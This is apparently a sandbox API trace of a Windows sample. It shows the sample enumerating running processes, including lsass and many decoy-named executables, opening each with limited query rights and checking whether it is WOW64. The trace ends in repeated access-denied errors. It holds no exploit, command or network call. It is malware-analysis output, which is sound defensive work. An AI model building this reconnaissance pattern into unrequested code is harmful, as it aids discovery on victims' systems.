	[0073.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.663] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.663] CloseHandle (hObject=0x224) returned 1
	[0073.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.664] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.664] CloseHandle (hObject=0x224) returned 1
	[0073.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728878, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.664] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.664] CloseHandle (hObject=0x224) returned 1
	[0073.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.664] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.664] CloseHandle (hObject=0x224) returned 1
	[0073.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.664] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.664] CloseHandle (hObject=0x224) returned 1
	[0073.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.664] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.665] CloseHandle (hObject=0x224) returned 1
	[0073.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728838, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.665] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.665] CloseHandle (hObject=0x224) returned 1
	[0073.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.665] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.665] CloseHandle (hObject=0x224) returned 1
	[0073.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.665] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.665] CloseHandle (hObject=0x224) returned 1
	[0073.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.665] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.665] CloseHandle (hObject=0x224) returned 1
	[0073.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.666] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.666] CloseHandle (hObject=0x224) returned 1
	[0073.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.666] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.666] CloseHandle (hObject=0x224) returned 1
	[0073.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.666] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.666] CloseHandle (hObject=0x224) returned 1
	[0073.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.667] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.667] CloseHandle (hObject=0x224) returned 1
	[0073.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728998, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.667] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.667] CloseHandle (hObject=0x224) returned 1
	[0073.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e798, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.667] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.667] CloseHandle (hObject=0x224) returned 1
	[0073.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728a18, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.667] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.667] CloseHandle (hObject=0x224) returned 1
	[0073.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.667] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.667] CloseHandle (hObject=0x224) returned 1
	[0073.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.668] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.668] CloseHandle (hObject=0x224) returned 1
	[0073.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0073.668] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.668] CloseHandle (hObject=0x224) returned 1
	[0073.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728a98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.668] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.668] CloseHandle (hObject=0x224) returned 1
	[0073.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.668] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.668] CloseHandle (hObject=0x224) returned 1
	[0073.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.668] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.669] CloseHandle (hObject=0x224) returned 1
	[0073.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e8b0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.669] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.669] CloseHandle (hObject=0x224) returned 1
	[0073.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.669] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.669] CloseHandle (hObject=0x224) returned 1
	[0073.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.669] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.669] CloseHandle (hObject=0x224) returned 1
	[0073.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728a38, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.669] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.669] CloseHandle (hObject=0x224) returned 1
	[0073.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.670] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.670] CloseHandle (hObject=0x224) returned 1
	[0073.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.670] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.670] CloseHandle (hObject=0x224) returned 1
	[0073.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e798, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.670] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.670] CloseHandle (hObject=0x224) returned 1
	[0073.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e8b0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.670] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.670] CloseHandle (hObject=0x224) returned 1
	[0073.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.670] GetLastError () returned 0x5
	[0073.670] GetLastError () returned 0x5
	[0073.670] GetLastError () returned 0x5
	[0073.670] GetLastError () returned 0x5
	[0073.670] GetLastError () returned 0x5
	[0073.670] GetLastError () returned 0x5
	[0073.670] GetLastError () returned 0x5
	[0073.670] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
	[0073.671] GetLastError () returned 0x5
